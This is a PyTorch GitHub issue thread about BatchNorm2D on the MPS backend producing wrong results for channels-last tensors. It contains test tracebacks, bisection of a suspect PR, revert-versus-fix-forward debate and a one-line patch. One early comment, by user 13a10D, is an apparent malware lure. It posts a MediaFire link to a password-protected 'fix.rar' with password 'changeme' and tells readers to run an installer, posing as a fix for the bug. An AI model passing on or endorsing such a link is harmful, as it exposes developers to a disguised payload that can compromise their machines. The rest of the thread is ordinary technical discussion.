### ISSUE TITLE
[MPS] BatchNorm2D produces incorrect results for column first tensors

### ISSUE THREAD

**Issue by malfet** [pytorch/pytorch#134580]
### 🐛 Describe the bug

Discovered while fixing BatchNorm2D for empty tensors (marked as reason for skip in https://github.com/pytorch/pytorch/issues/100914 ) and  attempting to remove https://github.com/pytorch/pytorch/blob/3418708abfc21d190a4658c477bfb2f42ac107f6/torch/testing/_internal/common_modules.py#L3462-L3464

```
% python test_modules.py -v -k test_memory_format_nn_BatchNorm2d_
FAIL: test_memory_format_nn_BatchNorm2d_eval_mode_mps_float32 (__main__.TestModuleMPS)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "/Users/malfet/git/pytorch/pytorch/torch/testing/_internal/common_utils.py", line 2962, in wrapper
    method(*args, **kwargs)
  File "/Users/malfet/git/pytorch/pytorch/torch/testing/_internal/common_device_type.py", line 448, in instantiated_test
    result = test(self, **param_kwargs)
  File "/Users/malfet/git/pytorch/pytorch/torch/testing/_internal/common_utils.py", line 1522, in wrapper
    fn(*args, **kwargs)
  File "/Users/malfet/git/pytorch/pytorch/torch/testing/_internal/common_modules.py", line 129, in test_wrapper
    return test(*args, **kwargs)
  File "/Users/malfet/git/pytorch/pytorch/torch/testing/_internal/common_cuda.py", line 225, in wrapped
    return f(*args, **kwargs)
  File "/Users/malfet/git/pytorch/pytorch/test/test_modules.py", line 745, in test_memory_format
    self.assertEqual(outputs, desired_outputs, rtol=rtol, atol=atol)
  File "/Users/malfet/git/pytorch/pytorch/torch/testing/_internal/common_utils.py", line 3868, in assertEqual
    raise error_metas.pop()[0].to_error(
AssertionError: Tensor-likes are not close!

Mismatched elements: 212 / 216 (98.1%)
Greatest absolute difference: 16.83740234375 at index (0, 0, 5, 0) (up to 1e-05 allowed)
Greatest relative difference: 178.90695190429688 at index (0, 1, 4, 3) (up to 1e-05 allowed)

To execute this test, run the following from the base repo dir:
    python test/test_modules.py TestModuleMPS.test_memory_format_nn_BatchNorm2d_eval_mode_mps_float32

This message can be suppressed by setting PYTORCH_PRINT_REPRO_ON_FAILURE=0
```

### Versions

nightly

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by hvaara** [comment]
Reproed on `v2.4.0` by cherry picking with `git cherry-pick 39652d8^..01204dd` and adding `expectedFailureMPS` from https://github.com/pytorch/pytorch/pull/134184. Available in https://github.com/hvaara/pytorch/tree/repro-24-134580.

Debug notes in https://gist.github.com/hvaara/140a09f0fd5b4c36932bebdfc9275c3c. Note that the test output is somewhat different from what you got.

**Comment by hvaara** [comment]
Eval mode is working in `v2.4.0`. Ie. `test_memory_format_nn_BatchNorm2d_eval_mode_mps_float16` and `test_memory_format_nn_BatchNorm2d_eval_mode_mps_float32`. It's the train mode that's failing on both. Ie. `test_memory_format_nn_BatchNorm2d_train_mode_mps_float16` and `test_memory_format_nn_BatchNorm2d_train_mode_mps_float32`. I'll try to repro immediately before and after https://github.com/pytorch/pytorch/pull/133610 to verify if that's the culprit.

**Comment by hvaara** [comment]
278bc985d71f1ee09a499fba2ea5032b7baf2567 is the parent of 43f78bf37a0432af4c048e1f1363838f26ef3295 from PR #133610.

With 278bc985d71f1ee09a499fba2ea5032b7baf2567 (before #133610) as base: https://gist.github.com/hvaara/40b510a2521e7f452bd6eec1da38e128
With 43f78bf37a0432af4c048e1f1363838f26ef3295 (after #133610) as base: https://gist.github.com/hvaara/2b7a48e4ea0a2070bbfd4e914e5c4906  

I think this is strong evidence that #133610 is the culprit. Roll back or fix forward? We also need to consider #134121.

cc @atalman

**Comment by qqaatw** [comment]
@malfet that's the reason I said the issue is tricky and should be fixed carefully here: https://github.com/pytorch/pytorch/pull/133610#discussion_r1720493110

If this problem is indeed introduced by #133610, I think the safest way is to revert it first and then try to address it carefully.

**Comment by hvaara** [comment]
> [...] I think the safest way is to revert it first and then try to address it carefully.

I tend to agree with you, @qqaatw. My concern is that we'll reintroduce the regression from #133520. It is very visible to end-users right now because of the popularity of [FLUX](https://huggingface.co/black-forest-labs/FLUX.1-schnell).

The new correctness issue we're seeing in this here seems to only happen with `ChannelsLast` judging from the tests. Is it an option to reintroduce the previous behavior only for `ChannelsLast`?

**Comment by qqaatw** [comment]
> My concern is that we'll reintroduce the regression from https://github.com/pytorch/pytorch/issues/133520.

IMO #133610 introduced a regression, and reverting it means we transition from the state of "bug fixed" to "bug not yet fixed", which to my understanding is not a regression because it hasn't been included in a stable release.

cc @DenisVieriu97 for visibility.

**Comment by malfet** [comment]
I'll propose a PR that should reconcile both use cases (i.e. it will skip gather if both input and output memory layout is channels last, otherwise it will look at the contiguous property)

**Comment by hvaara** [comment]
Yes, #133610 introduces a regression.

But in #133520, the culprit was identified as #124895. See the bisect log in #133520. Prior to #124895 it was working. Users are reporting downgrading to `v2.3.1` solves the problem. Based on this I would say it's a regression.

So we're introducing a regression either way. Usually I'm always for rolling back over fixing forward when new issues are found. In this case however, we're going to be reverting to a known bad state. We're damned no matter what we do, which is why I'm leaning fix forward in this case.

**Comment by malfet** [comment]
> If this problem is indeed introduced by #133610, I think the safest way is to revert it first and then try to address it carefully.

Well, it's not, at least not entirely,  i.e. reverting the change does not fix the test.

**Comment by qqaatw** [comment]
> > If this problem is indeed introduced by #133610, I think the safest way is to revert it first and then try to address it carefully.
> 
> Well, it's not, at least not entirely, i.e. reverting the change does not fix the test.

I see. Then we should find a solution that addresses it holistically.

**Comment by malfet** [comment]
This fixes `eval` tests:
```patch
diff --git a/aten/src/ATen/native/mps/operations/Normalization.mm b/aten/src/ATen/native/mps/operations/Normalization.mm
index 72337b8d340..1bc8b654a90 100644
--- a/aten/src/ATen/native/mps/operations/Normalization.mm
+++ b/aten/src/ATen/native/mps/operations/Normalization.mm
@@ -296,7 +296,7 @@ Check if running mean exists (maybe do this check before making graph)
       newCachedGraph->runningVarInplaceUpdate_ = runningVarInplaceUpdate;
     });
 
-    auto inputPlaceholder = Placeholder(cachedGraph->inputTensor_, self, input_shape);
+    auto inputPlaceholder = Placeholder(cachedGraph->inputTensor_, self, input_shape, memory_format != MemoryFormat::ChannelsLast);
     auto weightPlaceholder = Placeholder();
     if (has_weight)
       weightPlaceholder = Placeholder(cachedGraph->weightTensor_, weight_opt.value(), new_mean_shape);
```

**Comment by kulinseth** [comment]
> This fixes `eval` tests:
> 
> ```diff
> diff --git a/aten/src/ATen/native/mps/operations/Normalization.mm b/aten/src/ATen/native/mps/operations/Normalization.mm
> index 72337b8d340..1bc8b654a90 100644
> --- a/aten/src/ATen/native/mps/operations/Normalization.mm
> +++ b/aten/src/ATen/native/mps/operations/Normalization.mm
> @@ -296,7 +296,7 @@ Check if running mean exists (maybe do this check before making graph)
>        newCachedGraph->runningVarInplaceUpdate_ = runningVarInplaceUpdate;
>      });
>  
> -    auto inputPlaceholder = Placeholder(cachedGraph->inputTensor_, self, input_shape);
> +    auto inputPlaceholder = Placeholder(cachedGraph->inputTensor_, self, input_shape, memory_format != MemoryFormat::ChannelsLast);
>      auto weightPlaceholder = Placeholder();
>      if (has_weight)
>        weightPlaceholder = Placeholder(cachedGraph->weightTensor_, weight_opt.value(), new_mean_shape);
> ```

We reverted the original change by @DenisVieriu97 which addressed the NHWC issues.

**Comment by malfet** [comment]
> We reverted the original change by @DenisVieriu97 which addressed the NHWC issues.

@kulinseth do you mind linking a PR/commit you are referring to?

**Comment by kit1980** [comment]
Did https://github.com/pytorch/pytorch/pull/134618 fix this?

**Comment by hvaara** [comment]
> Did #134618 fix this?

#133610 introduced a regression. The regression was fixed in #134618. The backwards pass still has a correctness issue that was present prior to #133610, and the xfail references this issue https://github.com/pytorch/pytorch/blob/2157e396a3d5de0cc8627432b057d85ea960c778/torch/testing/_internal/common_modules.py#L3452-L3457

xref https://github.com/pytorch/pytorch/issues/133520#issuecomment-2379799789 for additional context

**Comment by hvaara** [comment]
@kit1980 I assume your follow-up question will be if the additional work will slip 2.5.0, which I think it will.

**Comment by malfet** [comment]
Thank you for reminder, I'll try to publish the fix by the end of the day.

**Comment by hvaara** [comment]
@kit1980 @malfet shouldn't #134618 be included in 2.5.0?

**Comment by kit1980** [comment]
@hvaara it landed before the branch cut of Sep 9, so included in 2.5.0, no need to cherry-pick.
